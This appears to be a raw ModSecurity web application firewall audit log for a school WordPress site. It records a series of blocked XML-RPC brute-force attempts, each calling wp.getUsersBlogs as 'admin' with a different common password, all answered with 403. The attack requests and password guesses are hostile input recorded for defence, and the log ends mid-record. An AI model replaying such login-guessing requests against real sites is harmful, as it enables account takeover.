--c2207450-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068453327839 5682 (- - -) Stopwatch2: 1745068453327839 5682; combined=4146, p1=503, p2=3447, p3=0, p4=0, p5=114, sr=93, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2207450-Z-- --11e0f355-A-- [19/Apr/2025:20:15:17 +0700] aAOh5UruoUXZj665VUHwJwAAANI 103.236.140.4 33544 103.236.140.4 8181 --11e0f355-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --11e0f355-C-- wp.getUsersBlogs admin mypassword --11e0f355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11e0f355-E-- --11e0f355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068517699291 5347 (- - -) Stopwatch2: 1745068517699291 5347; combined=4063, p1=469, p2=3396, p3=0, p4=0, p5=115, sr=90, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11e0f355-Z-- --0d10494d-A-- [19/Apr/2025:20:16:21 +0700] aAOiJXNa4dA2HllpK_N1vgAAAIk 103.236.140.4 33858 103.236.140.4 8181 --0d10494d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d10494d-C-- wp.getUsersBlogs admin explorer --0d10494d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d10494d-E-- --0d10494d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068581896593 5229 (- - -) Stopwatch2: 1745068581896593 5229; combined=3905, p1=482, p2=3232, p3=0, p4=0, p5=113, sr=92, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d10494d-Z-- --c7406f21-A-- [19/Apr/2025:20:17:29 +0700] aAOiaevDiFC_ir7MDwbf9wAAAFA 103.236.140.4 34174 103.236.140.4 8181 --c7406f21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7406f21-C-- wp.getUsersBlogs admin security --c7406f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7406f21-E-- --c7406f21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068649940563 5687 (- - -) Stopwatch2: 1745068649940563 5687; combined=4016, p1=473, p2=3367, p3=0, p4=0, p5=104, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7406f21-Z-- --6fd1ff74-A-- [19/Apr/2025:20:18:32 +0700] aAOiqOvDiFC_ir7MDwbgFAAAAEc 103.236.140.4 34468 103.236.140.4 8181 --6fd1ff74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fd1ff74-C-- wp.getUsersBlogs admin qweasdzx --6fd1ff74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fd1ff74-E-- --6fd1ff74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068712103737 5763 (- - -) Stopwatch2: 1745068712103737 5763; combined=4058, p1=524, p2=3344, p3=0, p4=0, p5=110, sr=90, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fd1ff74-Z-- --7f47a26c-A-- [19/Apr/2025:20:19:35 +0700] aAOi5-vDiFC_ir7MDwbgHgAAAE0 103.236.140.4 34782 103.236.140.4 8181 --7f47a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7f47a26c-C-- wp.getUsersBlogs admin 123456qwe --7f47a26c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f47a26c-E-- --7f47a26c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068775335896 6132 (- - -) Stopwatch2: 1745068775335896 6132; combined=4126, p1=501, p2=3447, p3=0, p4=0, p5=105, sr=108, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f47a26c-Z-- --7e54a968-A-- [19/Apr/2025:20:20:35 +0700] aAOjIw6cTFSgLAHl7PrScgAAABI 103.236.140.4 35056 103.236.140.4 8181 --7e54a968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e54a968-C-- wp.getUsersBlogs admin 12345zx --7e54a968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e54a968-E-- --7e54a968-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068835460153 5556 (- - -) Stopwatch2: 1745068835460153 5556; combined=4221, p1=522, p2=3449, p3=0, p4=0, p5=142, sr=120, sw=108, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e54a968-Z-- --9bd5597e-A-- [19/Apr/2025:20:21:17 +0700] aAOjTUruoUXZj665VUHwrwAAANc 103.236.140.4 35270 103.236.140.4 8181 --9bd5597e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bd5597e-C-- wp.getUsersBlogs admin 1234%^&* --9bd5597e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd5597e-E-- --9bd5597e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068877708500 4337 (- - -) Stopwatch2: 1745068877708500 4337; combined=3295, p1=356, p2=2761, p3=0, p4=0, p5=109, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd5597e-Z-- --d4604d7a-A-- [19/Apr/2025:20:21:36 +0700] aAOjYEruoUXZj665VUHwxAAAAM0 103.236.140.4 35350 103.236.140.4 8181 --d4604d7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4604d7a-C-- wp.getUsersBlogs admin a123456 --d4604d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4604d7a-E-- --d4604d7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068896690996 5561 (- - -) Stopwatch2: 1745068896690996 5561; combined=3963, p1=515, p2=3247, p3=0, p4=0, p5=115, sr=119, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4604d7a-Z-- --f4684249-A-- [19/Apr/2025:20:22:41 +0700] aAOjoevDiFC_ir7MDwbgXAAAAEY 103.236.140.4 35642 103.236.140.4 8181 --f4684249-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4684249-C-- wp.getUsersBlogs admin fuckyou --f4684249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4684249-E-- --f4684249-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068961299454 5467 (- - -) Stopwatch2: 1745068961299454 5467; combined=3856, p1=476, p2=3206, p3=0, p4=0, p5=101, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4684249-Z-- --6f7f9f23-A-- [19/Apr/2025:20:23:44 +0700] aAOj4OvDiFC_ir7MDwbgigAAAEQ 103.236.140.4 35940 103.236.140.4 8181 --6f7f9f23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6f7f9f23-C-- wp.getUsersBlogs admin master --6f7f9f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f7f9f23-E-- --6f7f9f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069024161048 5752 (- - -) Stopwatch2: 1745069024161048 5752; combined=4017, p1=520, p2=3308, p3=0, p4=0, p5=110, sr=103, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f7f9f23-Z-- --140ad93c-A-- [19/Apr/2025:20:24:46 +0700] aAOkHg6cTFSgLAHl7PrSzAAAABA 103.236.140.4 36230 103.236.140.4 8181 --140ad93c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --140ad93c-C-- wp.getUsersBlogs admin william --140ad93c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --140ad93c-E-- --140ad93c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069086953345 6031 (- - -) Stopwatch2: 1745069086953345 6031; combined=4201, p1=482, p2=3462, p3=0, p4=0, p5=148, sr=90, sw=109, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --140ad93c-Z-- --d1c5a025-A-- [19/Apr/2025:20:25:47 +0700] aAOkW3Na4dA2HllpK_N2kQAAAI4 103.236.140.4 36502 103.236.140.4 8181 --d1c5a025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d1c5a025-C-- wp.getUsersBlogs admin killer --d1c5a025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1c5a025-E-- --d1c5a025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069147342634 4580 (- - -) Stopwatch2: 1745069147342634 4580; combined=3486, p1=366, p2=2917, p3=0, p4=0, p5=115, sr=78, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1c5a025-Z-- --d6336e12-A-- [19/Apr/2025:20:26:53 +0700] aAOknXNa4dA2HllpK_N2sQAAAJY 103.236.140.4 36816 103.236.140.4 8181 --d6336e12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6336e12-C-- wp.getUsersBlogs admin tinkerbell --d6336e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6336e12-E-- --d6336e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069213441461 5152 (- - -) Stopwatch2: 1745069213441461 5152; combined=4117, p1=461, p2=3408, p3=0, p4=0, p5=140, sr=88, sw=108, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6336e12-Z-- --a86c573e-A-- [19/Apr/2025:20:27:53 +0700] aAOk2evDiFC_ir7MDwbg0QAAAEI 103.236.140.4 37090 103.236.140.4 8181 --a86c573e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a86c573e-C-- wp.getUsersBlogs admin Million2 --a86c573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a86c573e-E-- --a86c573e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069273328828 5184 (- - -) Stopwatch2: 1745069273328828 5184; combined=3773, p1=452, p2=3125, p3=0, p4=0, p5=112, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a86c573e-Z-- --acde1a0e-A-- [19/Apr/2025:20:28:58 +0700] aAOlGg6cTFSgLAHl7PrS_QAAAA4 103.236.140.4 37402 103.236.140.4 8181 --acde1a0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --acde1a0e-C-- wp.getUsersBlogs admin a801016 --acde1a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acde1a0e-E-- --acde1a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069338441847 5192 (- - -) Stopwatch2: 1745069338441847 5192; combined=3799, p1=494, p2=3127, p3=0, p4=0, p5=103, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acde1a0e-Z-- --dca1d43e-A-- [19/Apr/2025:20:30:01 +0700] aAOlWXNa4dA2HllpK_N3EQAAAIA 103.236.140.4 37672 103.236.140.4 8181 --dca1d43e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 